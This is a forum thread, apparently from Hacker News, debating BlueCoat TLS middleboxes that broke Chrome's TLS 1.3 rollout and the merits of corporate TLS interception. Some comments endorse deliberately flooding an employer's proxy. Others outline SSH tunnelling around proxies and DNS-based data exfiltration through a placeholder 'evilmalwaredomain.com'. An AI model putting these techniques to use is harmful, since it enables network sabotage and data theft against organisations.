Note that this happens even when using a BlueCoat proxy in non-MITM mode. BlueCoat tries to "analyze" TLS connections, and rejects anything it doesn't understand. This exact issue occurred with TLS 1.2 back when BlueCoat only understood 1.1/1.0.
In this case, it doesn't sound like they're reverting it because of overall breakage, but rather because it breaks the tool that would otherwise be used to control TLS 1.3 trials and other configuration. Firefox had a similar issue, where they temporarily used more conservative settings for their updater than for the browser itself, to ensure that people could always obtain updates that might improve the situation.
This exact issue occurred with TLS 1.2 back when BlueCoat only understood 1.1/1.0.
Good grief! From David Benjamin's final comment:
Note these issues are always bugs in the middlebox products. TLS version negotiation is backwards compatible, so a correctly-implemented TLS-terminating proxy should not require changes to work in a TLS-1.3-capable ecosystem. It can simply speak TLS 1.2 at both client <-> proxy and proxy <-> server TLS connections. That these products broke is an indication of defects in their TLS implementations.
It's understandable that I've never heard of BlueCoat: clearly this product's success is based more on selling to executives than on quality, and it has been some time since I worked in an organization that had executives to sell to.
How do you fix this when you're naught but a humble employee? Well, a friend of mine worked at a fairly large tech company where a salesguy for these boxes had convinced the CTO they had to have them. Every tech-person "on the floor" hated the idea, so before the boxes were installed they conspired on their free time to write some scripts that ran lots of legitimate HTTPS traffic, effectively DDOSing the boxes and bringing the company's internet to a crawl for the day, like Google would take ten seconds to open. Then obviously everyone (including the non-tech people) started calling the IT helpdesk complaining that the internet was broken. MITM box salesguy then had to come up with a revised solution, costing 20x more than his first offer, and that was the end of that.
If you already are suffering under MITM boxes, a similar strategy with a slow ramp-up in traffic might work.
Yeah. This is a firable offense. The solution to your company MITM your traffic is not to use your work computer for anything personal that matters. It's not like if we had a shortage of devices to connect to the internet.
If you live in a third-world country (or the US) which lacks basic functions of society like employee protection, a sensible minimum wage, universal healthcare, paid parental leave, etc., then yes, I don't recommend doing what my friend did with employing a little "civil disobedience" in such cases.
TBH, for most techies I don't think opposition to MITM boxes comes down to "I don't want them to catch me looking at cat photos" but more along the lines of "this will actually reduce security as much as it improves it, and the companies providing these products are also aiding repressive regimes and human rights violations across the globe". Personally, I would find it unethical for the company I work for to buy these products.
I agree talking to IT is step 1, and I'm assuming that hasn't worked.
Collective action (strikes, "work slowly protests" etc.) as a protest against company policy has a long precedent of a) being protected by law and b) being much more effective than a single employee quitting, while simultaneously reducing the downside for employees (in L_\infty norm).
Edit: the old Keynes quote comes to mind: "if you owe the bank $100 you have a problem, but if you owe the bank $100 million the bank has a problem" -- if 1 of the company's devs commits a "fireable offense", he/she has a problem, but if 100 of them do, the company has a problem.
However with collective action, the company is usually aware of their employees actions, here if I'm reading correctly management were not notified that this was happening, so perhaps not quote the same thing.
When I mentioned on a mailing list that we should probably pronounce this like "expect your personal bank info to be pwned" rather than "please don't use work resources for personal purposes", I was reminded that there are lots of perfectly reasonable work-related purposes that are undermined by TLS MitM. Corporate bank accounts, ACH transactions, payroll, vendor accounts, tax portals, employee benefits/401k, etc. All of that stuff should actually be secure.
Incidentally, "Blue Coat ProxySG 6642" was the only middlebox to get an "A" from the study referenced above. Apparently they didn't test for 1.3...
Absolutely, but then the right approach is to let the IT dept know that they are running the company into the ground. Often, the IT department or management may be insensitive to that argument (and then you get a Sony Entertainment hack, but then it is well deserved) or they may follow regulations that are beyond their control. But it is a management decision.
How are any of the things you listed undermined by corporate MitM?
Everything you listed is information that the company already has access to. Why isn't it sufficient for there to be access controls by policy, the same way the company protects other sensitive information from unauthorized acres within the company?
Keep up man! Upthread [0], reference was made to a study that's recently made the rounds detailing the basic insecurity of MitM devices. The problem isn't only that corporate network admins see everything, it's also that after the device downgrades TLS (or worse) attackers can also see what they want...
My day job includes working on FreeBSD systems and also doing open source FreeBSD work (push upstream, pull down to us). There are sometimes embargoed security notices in my email. There is no chance I will permit my employer to MITM my SSL and risk some clowns in corporate IT from obtaining these mails. (highest security ones are GPG encrypted, but others are not)
I need my personal email to do my work. It needs to stay secure from even my own employer. Period.
Kinda amazed you got downvoted for pointing out that the parent is essentially advocating for intentionally trying to take down your employer's network because you dislike their IT policy.
This isn't just a fireable offense. Especially given the tendency for computer-related criminal laws to be overly vague, it's entirely possible you could be charged with a crime if you are intentionally trying to DoS your employer's network.
Same thing I did when I noticed our bluecoat started mitm-ing my bank connection - ticket to IT to enable bypass for specific domain. They refused to do it for google/gmail, but banking sites start working normally on the next day. Youtube, facebook and other non work related stuff is just blocked, unless you need them to do your job (like PR dept).
Bluecoat is extremely widely used in some fields. They were in the news a while back when it was discovered that Syria (before the civil war) was censoring their internet access using Bluecoat devices (allegedly unauthorized by Bluecoat)[1]
They have many costumers on the Fortune 500 portfolio that make sure the workers only visit the web sites they should and also IT get to know when they misbehave.
The entire use case of BlueCoat and the like is to satisfy executives' desire to spy on all usage of their network. It's certainly not to benefit the users who are stuck behind it, to increase their security, or to give them a better Internet experience.
Fuck the users. If users had their way, they'd have all the local administrator privileges they wanted so that they could download malware to their heart's content. From a non-IT perspective, they would also be free to download porn, potentially child porn, which is a crime to merely possess, and exfiltrate terabytes of company secrets.
Which holds trusted secret keys and which, in its normal unremarkable operation, intercepts, parses, reconstructs, decrypts, re-encrypts, forwards, and optionally logs both confidential and attacker-controlled traffic? And is also known to be used for nationwide bulk internet censorship by regimes often called 'oppressive'?
Why, doesn't it just.
Please consider, very carefully, the ethics and equities issues one might face with any interesting findings here.
What's true is true - better to know it than stick our heads in the sand. If these boxes have vulnerabilities (who am I kidding, they do parsing, they're probably implemented in C "for performance", of course they have vulnerabilities), we are better off for knowing about them than not.
This is precisely the conclusion Google reached and has used as they work on QUIC.
Even protocol state (equivalents of TCP FIN/SYN/etc) is encrypted, to ensure that middleboxes don't get ideas about what the protocol is 'supposed' to do - ideas which make it hard to change the protocol in the future.
Actually, no, that would just make everything more difficult. Browsers need to start coming to terms with the fact that they do not get do dictate how www networking operates for every organization around the world.
There are hundreds of thousands of organizations that need inspection and caching and proxying of internal www traffic. That all protocols should disallow or frustrate this disregards real needs of users and organizations.
Further still, if protocols can't be designed to be implemented easily or to allow for implementation bugs or lack of features, it's a crap protocol or application. Middleware will always be necessary, and encryption really shouldn't change the requirements of how middleware needs to work with a protocol.
I disagree. We were living in the period of easy middleware (this was before HTTPS rollout), and it generally sucked -- there were supercookies, ads injection, general app breakage when you get a captive portal page instead of expected RPC response.
The middleware should require effort to install, and it should be obvious when it is active. Otherwise, companies which have no business MITM'ing the traffic -- such as ISPs and free wifi providers -- will start to do it just because it's so simple.
For example, Google may require MDM app on the Android devices which is used to access corporate data. This app ensures that the device has the right policy (screen lock, encryption) and I think it may also check for malware apps. This is how it should be -- if you need corporate control over devices, install special application on it, it will be more efficient and it will do more.
And that's why the browser is at fault - they could have designed it to be more permissive or more secure, depending on the role. They decided instead on a one-size approach, once too permissive, now too restrictive.
As a regular user, I can't just use a captive portal to get free wifi, because any site I go to has HTTPS, so they all break and I can't accept the god damn HTTP accept page unless I can conjure up a valid domain that has no HTTPS like I'm Svengali. Now all the OSes have special checks to see if there's a captive portal because the browsers couldn't be troubled to build a function for it, even though it would improve their security and usability at the same time.
Captive portals are not the enemy. Shitty UX and a bad attitude toward the needs of real users is. Locking browsers/protocols down more is just doubling down on this mentality.
Yes, captive portals are the enemy. They break an important assumption: requests either succeed and return correct data, or fail and return an error.
Were you writing a forum post? It was lost because it got submitted to captive portal. Were you in dynamic app? It crashed because it got HTML instead of JSON. Does you page reload ads in the i-frames? Your page position and page itself is now lost, and you are in captive portal page. Did you have a native app which did HTTP requests and cached them? Congrats, you have invalid data in your cache now.
And I have seen captive portals which were broken. How about you get redirected to login page every time you go to your favorite website, because the redirect page got cached somehow?
Good riddance. Yes, the browsers should include better captive portal support like android does, possibly triggered by the SSL certificate mismatch errors, but even the current situation when I have to type "aaa.com" by hand all the time is great.
Captive portal authentication functionality has no business being part of a browser anyway. Why should I have to start a browser to make my non-browser client application connect to my non-HTTP server?. A captive portal is a special case of rich network-level authentication, which belongs in the operating system. Also, 802.11u is specifically designed to help create uniformity in this area.
Then those organizations are free to not use encryption-friendly protocols for internal resources. Furthermore, those companies are free to fork Chromium or Firefox and distribute their own browser that renders these protocols toothless.
IOW, it's completely fair to argue that users might not have a universal right to encryption, but it's just as legitimate to argue that browser vendors have no obligation to enable the trivial circumvention of encryption. If the software doesn't work for your needs, then stop using the software.
No they aren't, encryption is still required for internal transactions as well as working with external partners. And fork a browser? Are you nuts?
Nobody made that argument. But browser makers have an obligation to keep the world wide web usable. If it's not usable, say goodbye to dot com companies selling services to businesses, which aside from advertising revenue (and the hopes and dreams of venture capitalists) is the only way they survive.
The only reasonable alternative if you start locking out legitimate business use cases of traffic inspection is to abandon the web and start making proprietary native applications and protocols like back in the old days. This is bad for users and bad for business.
It's not like it's even hard to support these use cases while maintaining user security! Browsers just totally suck at interfacing with a dynamic user role. Better UX and a more flexible protocol would solve this, but nobody wants to make browsers easier to use (more the opposite)
> No they aren't, encryption is still required for internal transactions as well as working with external partners.
Then continue to use the encryption that exists today. After all, your concern is for future standards that make encryption stronger.
> And fork a browser? Are you nuts?
A lone user forking a browser would be nuts. A company that's already willing to pay through the nose for MITM proxies can afford to fund a minor browser fork. Indeed, if this use case is as important as you suspect, then you ought to start a company that sells customized browsers for exactly this purpose. Think about what site you're on; where's your entrepreneurial spirit? :)
> But browser makers have an obligation to keep the world wide web usable.
Usable for whom? Between users (who need strong encryption), websites (who need strong encryption), and corporate intranets (who need to snoop), whose needs ought to be prioritized?
> abandon the web and start making proprietary native applications
The web emerged from a world where all applications were native and proprietary, I don't think any browser vendor is losing sleep over this possibility.
> Browsers just totally suck at interfacing with a dynamic user role.
Again, sounds like there's demand for a new browser then. :)
> nobody wants to make browsers easier to use (more the opposite)
There is no such thing as a minor browser fork. And my whole point was to not pick a side, it was to make the browser more flexible so it worked for more cases, not less.
Every non-Microsoft browser vendor used to cry themselves to sleep at night from days fighting against vendor lock-ins and corruption of standards. They certainly care if it all goes south.
I suppose people don't want easier browsers because they imagine they are easy enough and can't imagine something better. At least I hope that's the reason, and not that they fear change, or are indifferent to the needs of people other than themselves and prefer to design for that alone.
There's no way in hell I'm crazy enough to make a browser, though. I'd rather run for elected office, or eat an entire Volkswagen Golf.
BlueCoat makes me cry. We have an application running inside the firewall of one of our clients that communicates with a HTTPS REST API hosted by a server in our datacenter. The connection must be encrypted because it handles confidential information, but when it passes through BlueCoat's TLS proxy, the Authorization header gets mangled and it can't authenticate against our backend. Higher-ups decided that it would be better to try to convince the client to let our app bypass their proxy than to implement a custom workaround for BlueCoat users, but the client never let us through, so the only solution we could implement involved manually SCPing the required data between client and server.
Ssh is almost often available to connect through the firewall. Do IT people understand how easily you can work around proxy using ssh ? Just start a vm in the cloud (like a C1 at scaleway for 3.6€ per month), install squid (with default options). On your PC, run portable applications: putty connected to your vm with a forward of proxy port and portable firefox configured to use your forwarded proxy.
There's not even a need for installing a proxy! SSH has native SOCKS proxy support, so all you need to do is set up an SSH connection and set the browser connection to a dynamic SSH port forward.
This also prevents leaking DNS requests : with a standard proxy your computer might be trying to look up domains using the company DNS system. With a SOCKS proxy, you can forward all DNS traffic as well!
The problem is middleboxes like fortigate also do MITM on ssh connections. Assuming you are not bringing home devices into work and don't have your ssh server's fingerprint memorized you might be tempted to just type 'yes' when prompted.
In any case you are left with no SSH, or somebody watching your ssh and have control over your ability to tunnel.
The best you can do with these boxes is make a sub tunnel over one of the protocols that they do allow through, you just can't rely on the primary encryption provided by the protocol that the middle box is executing MITM on. If somebody actually looks at the traffic they will see that you are not transferring plain text at the middle box, so that might raise some eyebrows.
From what I've read (http://www.gremwell.com/ssh-mitm-public-key-authentication), if you use public key authentication with SSH, the MITM will break the authentication (forcing ssh to ask for a password). It's the same as with TLS client certificate authentication: in the same way the server certificate authenticates the server to your browser, the client certificate authenticates your browser to the server, and the server will reject MITM connections as unauthenticated.
While unfortunately for TLS client certificates are not a solution against MITM due to their awful user experience and privacy concerns, for SSH public key authentication has a good user experience, and is very common.
In my experience many companies simply filter based on port number. Run your external sshd/openvpn on port 80 and you're good to go. But of course that's going off topic since TFA is obviously about middleboxes actually intercepting and analyzing the traffic.
In truth though if you start considering your employees like the enemy it's just a never ending upwards battle, especially if your employees are comp-sci folks. You could tunnel SSH over HTTP or even DNS if you cared enough.
You want your employees to collaborate with you avoiding and tracking down malware and potential leaks. If everybody is used to working around your restrictions you just make it harder for you to figure out what's happening when something goes wrong.
For instance if your policies are too restrictive people will use their smartphones more and more to access the internet. Then some will start doing work stuff on their smartphones and you lose all control. What do you do then? Forbid smartphones within the company? Fire everybody you catch using one? It's just an arms race at this point.
Sane security measures and some pedagogy go a long way. Easier said than done though, it's a tough compromise to make.
Ask what goal they're trying to solve: is it really because the IT people want to monitor everyone's web surfing or do they have something like an audit requirement? There are a LOT of people in the latter camp who need to check the box to say they comply with some policy, regulation, etc.
Similarly, good security people know that port filtering is a losing game unless you are willing to restrict everything to a known-safe whitelist – the malware authors do work full-time on tunneling techniques, after all – and may be focusing their efforts on endpoint protection or better isolation between users/groups.
Rejecting anything it doesn't understand sounds like a bug to me. If it sees that it's TLS, it should attempt a protocol downgrade. There's absolutely no reason for this to break, as TLS 1.3 exists alongside TLS 1.2 (For now).
The surprising part (or maybe not) is that BlueCoat had been made aware of this change months ago and never got around properly testing it. This one of the softwares main purpose, and the fact that they didn't even make sure it works on the newest Chrome, leading to such a mess, is pretty sad.
The way this is going to be spinned, I promise you, is: Google released a new version of Chrome, and support for that upgrade is in BlueCoat v.next. Here's an invoice for the new license+consulting services for the upgrade.
In corporate environments, the last thing that changes is the thing that gets blamed. BlueCoat was not upgraded, Chrome was, and now things are broken? Not their fault.
Rejecting anything it doesn't understand sounds like a bug to me.
It sounds like a perfectly reasonable behaviour if the goal is to "fail closed", to provide more security in a fashion similar to a whitelist.
If it sees that it's TLS, it should attempt a protocol downgrade.
I don't remember the exact details but I recall reading that TLS has a mechanism to prevent version downgrades, precisely to defend against such "attacks", so the connection would not succeed in that case either.
The TLS negotiation is mutual. Both endpoints tell each other what they support and they agree on a protocol that's mutually supported.
If merely advertising 1.3 while still advertising older versions causes blue coat to break, it has a bug in TLS version negotiation.
There is no downgrade or whitelist or failing closed. Each end says what they support and BlueCoat blows up the connection if it sees that the other end supports a newer version. It should say "oh we both support 1.2 let's use that" And apparently it's done this before so there's even less an excuse for it.
This is apparently a problem when bluecoat is used in non-mitm mode. That probably means bluecoat is merely inspecting the initial handshake, not modifying it. That would imply it can't actually modify the handshake.
It then simply inspects a connection it doesn't understand and 'fails closed' by preventing that connection.
Client and Server exchange a list of capabilities at the beginning of a TLS connection, if the proxy just filters out the protocols/versions it doesn't understand, server/client will agree on a different version (like 1.2).
I've written a similar rebuttal to your sibling's comment here[1].
This isn't "failing closed", and this isn't a whitelist. TLS allows you to whitelist to certain versions of the protocol during the initial negotiation at the start of the protocol; that is the opportunity for either end to state what version of the protocol they'd like. It is not permissible in the protocol to close the connection as Blue Coat is doing.
This isn't a downgrade attack, either: both server and client are free to choose their protocol version at the beginning. The client & server will later verify that the actual protocol in use is the one they intended; this is what prevents downgrades.
It's in BlueCoat's political interests to make sure TLS 1.3 rolls out as slowly as possible since it actively works against their entire business model, so they have zero incentive to be proactive about this until the TLS 1.3 extensions are approved that make MITM possible again.
Sorry, no. TLS is explicitly designed to allow smooth upgrading like this. This proxy is supposed to (in response to a client hello w/ TLSv1.3) respond with TLSv1.2 if that's what it supports. This is still a rigorous parsing of the input being given: nothing is "not understood": version negotiation is an inherent part of the protocol and is supposed to allow for painless upgrades to more secure protocols.
The RFC (which if you're implementing TLS, you should have open at all times) explicitly calls out exactly this behavior:
> Note: some server implementations are known to implement version negotiation incorrectly. For example, there are buggy TLS 1.0 servers that simply close the connection when the client offers a version newer than TLS 1.0.
The quality of this vendor's implementation is extremely suspect.
It's a security feature, often malware will send encrypted traffic over 443 in an attempt to bypass firewalls. If BlueCoat can't understand the traffic, it drops it as it assumes it's malicious.
But the traffic is totally understandable -- the right action does not require knowing what TLS 1.3 is.
The way it is supposed to work is as following: there is a protocol negotiation when the connection is established (which is obviously unencrypted), which contains TLS version supported. If MITM proxy does not understand the version, it can just change these bytes to force hosts to negotiate at a lower version.
So the only reason BlueCoat fails is because the authors failed to implement force version downgrade.
The Bluecoat sales people did a number on you huh? Sounds really good until you ask 'why doesn't Bluecoat understand this traffic' - because it really should.
This is a failure to implement any version of TLS correctly, not just v1.3. (TLS has support for version negotiation including receiving a hello from a client with a future version, such as v1.3.)
The fix should not have been reversion. The fix should have been a simple workaround that if the connection fails totally and no downgrade handshake attempt was made, make a new connection using 1.2 to start with, which would succeed and the connection opened. This would be equivalent to a downgrade handshake from 1.3 to 1.2 but without requiring all products support 1.3.
The problem with this fix is that then as long as you have the fallback, the user gains none of the security properties of TLS 1.3 (since the attacker can always force a downgrade by sending junk to the client during the handshake) and has the additional cost of a second TLS negotiation.
While there was previously this "TLS fallback" implemented in Chrome to work around buggy endpoints, this was primarily due to buggy endpoints* which was a much larger issue and difficult to fix, while these middlebox issues affect a much smaller portion of users and we're hopeful that the middlebox vendors that have issues can fix their software in a more timely manner.
* TLS 1.3 moves the version negotiation into an extension, which means that old buggy servers will only ever know about TLS 1.2 and below for negotiation purposes and won't break in a new matter with TLS 1.3.
Am I not correct that 1.3 got backed out of chrome for the current issue? So 1.3 isn't even there now... Which breaks anything that explicitly requires 1.3. My fix would support all cases and not break anything. Unless I missed something?
Nothing can require 1.3, since 1.3 isn't finished yet. They were doing interoperability testing with a draft version of TLS 1.3, and nobody should require a draft version of TLS 1.3 without having a fallback to TLS 1.2.
Sometimes it is even worse than that. Some of the middleware TLS proxies don't verify the certificate before they resign the data. They completely open up your enterprise to MITM attacks, and in fact hide the fact that you are being MITMed. This came to light way back during the Superfish debacle, and some vendors still have not fixed the problem.
Amazing how this was predicted coming on a year ago*
> At this point it's worth recalling the Law of the Internet: blame attaches to the last thing that changed.
> There's a lesson in all this: have one joint and keep it well oiled.
> When we try to add a fourth (TLS 1.3) in the next year, we'll have to add back the workaround, no doubt. In summary, this extensibility mechanism hasn't worked well because it's rarely used and that lets bugs thrive.
This is even crazier than people may think on the first look.
The TLS community knew that there would be problems with the deployment of TLS 1.3 with version intolerance, because there always have been. That's why the version negotiation was changed and a mechanism called GREASE was invented to avoid just such problems. But it seems BlueCoat has shown us that there's no way to anticipate all the breakage introduced by stupid vendors.
The takeaway message is this: Avoid Bluecoat products at all costs. These companies are harming the Internet and its progress.
TLS1.3 may be a working draft, correctly implementing TLS version negotiation on the other hand is not as it already is a requirement of previous versions.
Sure, it's a working draft, but companies are actively working to develop and test their server side integrations. Having to disable it like this harms those efforts as fewer users are making connections (by default).
While there was a secondary issue with the deployment regarding unofficial builds/derivatives, the field trial was primarily rolled back due to the number of affected customers due to the middle-box issues in their enterprise/edu networks.
I'm sure the students of the Montgomery County, Maryland public school system, who are affected by this problem, will take your advice into consideration when submitting resumes to other public schools.
The Board doesn't have a choice, under CIPA[0], content filtering is a requirement for the FCC's E-Rate program[1] in which the government pays some of the cost of the school's internet connection.
Most (private) schools in my area do not interpret it to require MITM. We specifically want to avoid MITM because it's a can of worms we don't want opened. We rely instead on SNI-based filtering systems, which work well for the most part. I'm using TLS 1.3 in Firefox Nightly with no issues.
>> content filtering is a requirement for the FCC's E-Rate program in which the government pays some of the cost of the school's internet connection.
I'd be interested to see the cost of compliance versus the subsidy. The federal government puts an awful lot of strings on financing for schools given the relatively low percentage of overall funding they pay.
I'd like to see some state somewhere turn down the money and see what they can do with the extra flexibility.
IIRC the E-Rate program is a high double digit by percentage subsidy, such that Wireless ISPs will lose business by not having an E-Rate certification because the school will just stick with polky, 6mbps DSL for their 200+ kids at a rural school.
Of course they have a choice. It's not very princinpled to sell your children's online privacy in exchange for some "grant" money going to an oppressive-dictatorship supporting company like BlueCoat.
(Also it's possible can do server address based blocking without MITM)
Could they try to find an alternative source of funds (as the San Francisco Public Library did), or adopt an interpretation of CIPA under which they don't have to use this particular feature?
Think about how that conversation would go. They're driven by concerns that kids will look at porn – and remember that if they don't try to stop that, the local Fox News applicate will be running a loop 24x7 saying they're trying to force godly children to watch it – or that someone will breach a staff member's computer and steal PII, compromise the security cameras, etc.
Against that, making life hard for Chrome engineers’ aggressive upgrade campaign is pretty hard sell. “Buy a better box” perhaps but I don't see a viable argument for “don't monitor”.
Without an SSL MITM, Intrusion Detection Systems (IDS's) are much less effective.
If you're using your company's network, then they have every right to monitor all of the activity on it. They're trying to protect trade secrets, future plans, customer data, employee records, etc. from attackers who would use that information to do harm to the company, its customers, and its employees. If you don't want your employer to know what you're doing, then don't use the company computer or company network to do it. And while you may think that you're too tech savvy to fall prey to malware 1) not everyone at your company is, and 2) no amount of savvy will protect you from all malware, especially ones that gain a foothold through an unpatched exploit. And there's also that whole other can of worms: malicious employees.
I think this SSL MITM thing has gone way too far. When an exec asks an engineer if it's possible to monitor all internet communication that goes in and out of the company network, including communication that is encrypted by TLS, the correct answer is no. In fact, this specific thing is what TLS is designed to prevent, and new implementations of the protocol are only going to get better at preventing it. The exec will only get the answer they want if they pressure the engineer, or if the engineer is trying to sell them something (like a MITM proxy.) Then the engineer will admit that it's possible to snoop on some TLS connections if you do awful things like installing fake certificates on company laptops. They may or may not mention that if they do it wrong it will degrade the security of everything on the network. God forbid the computers at a bank should be less secure than the computers in the average household because a MITM proxy is silently downgrading the security of all the TLS connections that travel through it.
Now, because engineers are so bad at saying 'no' to the people who want SSL MITM, it's apparently become a regulatory requirement. SSL MITM might let you passively surveil your employees' Facebook Messenger conversations, but it still doesn't protect you against a malicious employee who is tech-savvy (or malware written by people who have SSL MITM proxies in mind.) They could just put the information they want to smuggle out of the network into an encrypted .zip. They could even do something creative like using steganography to hide it in family photos that they upload to Facebook. The only real solution to this is to lock down the devices that people access the network on, not the network itself.
>In fact, this specific thing is what TLS is designed to prevent, and new implementations of the protocol are only going to get better at preventing it.
This isn't true. The TLS protocol is not a philosophy; it does not have an opinion on who you should trust as a root certificate authority. If you trust a particular root, it is wholly within the design of TLS to allow connections that are monitored by whoever controls that root authority. Who is trusted is up to you.
>They may or may not mention that if they do it wrong it will degrade the security of everything on the network.
Right, that's why you don't do it wrong. This same argument applies for any monitoring technology, like cameras. An insecure camera system actually helps a would-be intruder by giving them valuable information. So if you install cameras, you'd better do it right.
As for your list of ways such a system could be circumvented, I don't understand the logic of it. So because there are ways around a security measure, you shouldn't use the security measure at all? There is no security panacea, just a wide range of imperfect measures to be deployed based on your threat model and resources. And luckily, most bad guys are pretty incompetent. But to address some examples you give, and show how not all is lost:
- A large encrypted zip file is sent out of the network. Depending on what your concerns are, that could be a red flag and warrant further analysis of that machine's/user's activity.
- Software trying to circumvent your firewall/IDS is definitely a red flag. You might even block such detected attempts by default, and just maintain a whitelist for traffic that should be allowed regardless (e.g. for approved apps that use pinned certificates for updates).
> > In fact, this specific thing is what TLS is designed to prevent, and new implementations of the protocol are only going to get better at preventing it.
> This isn't true. The TLS protocol is not a philosophy; [...]
Well, the TLS specification [1]
says as the first sentence of the introduction:
"The primary goal of the TLS protocol is to provide privacy and data
integrity between two communicating applications."
I think, if something is "the primary design objective of TLS", it can be said that TLS is designed to do it.
> This isn't true. The TLS protocol is not a philosophy; it does not have an opinion on who you should trust as a root certificate authority. If you trust a particular root, it is wholly within the design of TLS to allow connections that are monitored by whoever controls that root authority. Who is trusted is up to you.
Like the sibling comment said, this goes against the wording of the TLS specification, but I also think this is looking at the issue from the wrong perspective: from the perspective of the network admin rather than the user. The user does not trust the MITM proxy's fake root. Let's say you set up a corporate network and rather than just whitelisting the external IPs you trust, you give your users the freedom to browse the internet but you pipe everything through a BlueCoat proxy. Your users will take advantage of this freedom to do things like, say, checking their bank balance. When the user connects to the banking website, they will initialize a TLS session, the purpose of which is to keep their communication with their bank confidential. The user will assume their communication is confidential because of the green padlock in their address bar and the bank will assume their communication is confidential because it is happening over TLS. TLS MITM violates these assumptions. If the bank knew that a third party could see the plaintext of the communication, they probably would not allow the connection. If I ran a high-security website, I'd probably look for clues like the X-BlueCoat-Via HTTP header and just drop the connection if I found any.
> As for your list of ways such a system could be circumvented, I don't understand the logic of it. So because there are ways around a security measure, you shouldn't use the security measure at all?
In some cases, yeah. There are a lot of security measures out there that are just implemented to tick some boxes and don't provide much practical value. If they don't provide much value, but they actively interfere with real security measures (for example, by delaying the rollout of TLS 1.3) or they're just another point of failure and additional attack surface (bad proxies can leak confidential data, cf. Cloudflare,) they should be removed. I'll admit most bad guys are incompetent, but it's dangerous to assume they all are, because that gives the competent ones a lot of power, and someone who is competent enough to know that a network uses a TLS MITM proxy will just add another layer of encryption. (Or, like some other comments are suggesting, they'll just test your physical security instead and try to take the data out on a flash drive.)
> still doesn't protect you against (...) malware written by people who have SSL MITM proxies in mind
Exactly this is what I don't get. Since these abominations are becoming ubiquitous, surely malware writers are starting to work on workarounds? And in this case, it's as easy as setting up an SSH tunnel and running your malware traffic through that, which is a few days of work at best for a massive ROI?
Not even malware writers: on the recent Cloudflare incident, there was one password manager which was affected, but the leak was harmless for them because the content within their TLS connections had another layer of encryption. Both MITM proxies and their TLS-terminating CDN can see only encrypted data.
In which case your malware can do DNS lookups against a suitable domain: Just chop your file into suitable sized strings, encode them as suitable hostnames and look up [chunk of file].evilmalwaredomain.com, and soon enough the server handling evilmalwaredomain.com will have the whole file.
Or plain HTTP POSTs with encrypted content. If it reject stuff that looks encrypted, plain HTTP POSTs encoding the binary files by taking a suitably sized file of words and encode it as nonsensical rants to a suitable user-created sub-reddit.
Or e-mails made using the same mechanism.
If you want low latency two way communication doing this can be a bit hard, but you basically have no way of stopping even a generic way of passing data this way unless you only whitelist a tiny set of trusted sites and reject all other network traffic (such as DNS lookups). And keep in mind you can't just lock down client traffic out of the network - you also would need to lock down your servers and filter things like DNS - the above mentioned DNS approach will work even through intermediary recursive resolvers (malware infected desktop => trusted corporate recursive resolver => internet), unless they filter out requests for domains they don't trust.
But basically, if you allow data out, it's almost trivial to find ways to pass data out unless the channel is extremely locked down.
Totally agreed they have the right to monitor your network traffic, but I still think in most cases employees should try to push back on this.
At least from my view, it's not so much that I don't want my company to know what I'm doing, as that I don't trust their software to securely MITM all of my traffic. This thread doesn't fill me with confidence about the competency of these corporate MITM proxies. And the recent Cloudflare news doesn't help either -- they're effectively the world's largest MITM proxy, and even they couldn't avoid leaking a huge amount of "secure" traffic.
There are surely sectors where it's necessary for a company to MITM all traffic, but I think most companies will do better security-wise by not messing with TLS. It's just too hard to get right.
At my workplace where we have to do tls inspection for regulatory purposes we provide an internet-only wifi network for employee personal use where we don't intercept TLS. This network is fully isolated from the corporate network and corporate devices join a different, more monitored network. I believe this strikes the best balance between regulatory compliance and employee privacy. People can still use personal email or do online banking while at the office without inspection, but no corporate data can be moved en mass off company servers.
When connecting a corporate device to any non-corporate network (including the employee wifi) you can't go anywhere until the vpn is connected. The vpn routes you through all the same inspection points as being on premise.
And how can your inspection points verify that data isn't being exfiltrated? Arbitrary pipes can be made over SSH, over DNS, and I don't really consider these advanced. How do you handle techniques like chaffing and winnowing, steganography, or someone who knows how to transmit an arbitrary number of bits using only two bits?
DNS is my favourite hack in that respect because so few people are aware of it.
For those who don't know, there are even full IP proxies that uses DNS [1], but you can hack up a primitive one using shell script by basically setting up a nameserver for a domain, turning on all query logging and using a shell script that splits your file up, encodes it into valid DNS labels and requests [some encoded segment].[yourdomain]. Now your file will be sitting in pieces in your DNS query log and all you need is a simple script to re-assemble it.
Best of all is that it works even if it passes through intermediary DNS servers, such as a corporate proxy, unless it's heavily filtered (e.g. whitelisting domains) or too rate limited to be useful.
The VPN clients offer a "hotspot login" or such functionality so that you can open the access. It doesn't work for other use, just opening that VPN so that your company computer can connect to company network.
That obvious workaround doesn't give you a 24/7 hole from the Internet. To copy information, you need a person to knowingly do it. This decreases the attack surface tremendously.
> If you're using your company's network, then they have every right to monitor all of the activity on it.
It isn't a question of whether they're allowed to do it, it's a question of whether they should do it.
It's ineffective against insider exfiltration of data unless you're also doing body cavity searches for USB sticks, and if you're at that point then the sensitive network should not be connected to the internet at all.
And it's similarly ineffective against malware because TLS is not the only form of encryption. What difference does it make if someone uploads a file using opaque TLS vs. uploading an opaque encrypted file using MITM'd TLS? Banning encrypted files, even if you could actually detect them, doesn't work because they're often required for regulatory compliance.
It isn't worth the security cost. The situation in the article is bad enough, but consider what happens if the MITM appliance itself gets compromised when it has a root private key trusted by all your devices and modify access to all the traffic.
> It's ineffective against insider exfiltration of data unless you're also doing body cavity searches for USB sticks ...
I dunno. I know plenty of people who might want to work on an Excel spreadsheet at home over the weekend and so might e-mail it to their personal e-mail account. They would almost certainly reconsider, however, if it required copying that spreadsheet to a flash drive that they then had to hide in their ass, though.
In that case, it sounds like the device is effective after all.
It depends how much the data is worth. That's really the problem.
Suppose you're a college dorm network. Then you can't justify TLS MITM because the risk of your MITM device actively creating a security hole that leads to all the students' bank passwords being stolen is greater than any benefit from centrally monitoring the traffic in that environment.
Suppose you're a highly classified government research lab. Then you can't justify TLS MITM because the bad guys are skilled foreign government agents and you need to isolate the network from the internet.
And there is no happy medium because the risk and cost of having all your TLS-secured data compromised scales with the target value. The higher the target value the higher the risk created by the MITM proxy, all the way up to the point that you can justify isolating the network from the internet.
>It's ineffective against insider exfiltration of data unless you're also doing body cavity searches for USB sticks, and if you're at that point then the sensitive network should not be connected to the internet at all.
We opted to disable usb mass storage since cavity searches seemed a little much
> We opted to disable usb mass storage since cavity searches seemed a little much
This is missing the point. Someone could plug a SATA drive directly into the motherboard, or otherwise compromise their work computer to disable the restrictions, or take pictures of documents with a camera, or bring their own computer on-site, or bring a line-of-sight wireless network device on-site, or send the data over the internet as an encrypted file or via ssh or using steganograhy and so on.
